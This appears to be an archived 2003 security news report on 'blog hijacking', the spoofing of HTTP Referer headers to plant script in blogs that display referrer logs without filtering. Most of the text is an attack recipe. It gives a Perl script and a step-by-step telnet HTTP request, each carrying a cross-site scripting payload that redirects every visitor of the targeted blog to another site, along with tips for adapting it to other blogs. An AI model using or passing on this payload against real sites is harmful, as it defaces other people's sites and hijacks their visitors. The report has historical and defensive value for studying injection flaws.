R o o t s e c u r e . n e t
The Security News Site For Systems Administrators & Hackers Wednesday, 23rd July 2014 @ 17:15:48 GMT 
Reports | Blog Hijacking
{17th Feb 2003}
Rootsecure.net recently came across this post: http://www.unix-girl.com/blog/archives/000726.html, on how it is possible to hijack blogs, (along with any other site with similar insecure scripts) which was the inspiration for this report.

Referrer spoofing is changing the page that the site you goto thinks you came from, so you're on site A and you click a link on it taking you to site B.  Well your browser will send Site B the location of the page you were just on (Site A).  It has been possible ever since people started using home grown insecure scripts on their pages (ie ones which do not properly filter out HTML tags such as < > " ' & ;) however this is the first time Rootsecure.net has ever heard of the new phenomenon of "blog hijacking©" (spoofing your referrer to a blog so that everyone else that visits it will be redirected to another blog/site of your choice).  It is usually highly-noticeable because of the fact most blogs display referrers on the their home page.

The following Perl script can be used for such a purpose:

    #!usr/bin/perl -w
    print "Content-Type: text/html\n\n";
    my $url = "http://www.example.com";
    use LWP::UserAgent;
    use HTTP::Request::Common qw(GET POST);
    my $agent = LWP::UserAgent->new;
    my $req = GET $url, Referer => "\"></a><script>top.location.href=\'http://ww
w.someotherblog.com\';</script><a href=\"http://localhost\""; #print $agent->request($req)->as_string;
However by far a simpler way is to connect to the website via telnet, which should be readily available on any respectable computer.

  • Open a command windows and type in telnet followed by the name of the site followed by 80, e.g.
    telnet www.example.com 80
    (do not include http://)
  • Type the following into the command window (after changing the host field, and get request) - I would recommend copying the whole lot into notepad, making the changes, then copy/pasting it into the command window.
     
    GET /index.pl HTTP/1.1
    Host: example.com
    Accept: *.*
    User-Agent: Mozilla/4.0(compatible;MSIE6.0;WindowsNT5.1)
    Referer: http://"></a><script>top.location.href='http://www.someoth
    erblog.com';</script><a href="http://localhost"
    (Note referrer is all one line, and spelt "Referer")


  • Hit enter twice (the one in the middle of the keyboard, not the one on the number pad)

Note: Other blogs will have implemented their referrer logging scripts in different ways, therefore care is needed to properly end/begin HTML tags.

Update: Blog that was originally hijacked - http://jeremy.zawodny.com/blog/archives/000536.html
Roundup of "Blog-Hijacking" - http://www.notestips.com/80256B3A007F2692/1/NAMO-5KC2YN

Further Update: The Register have picked up the story.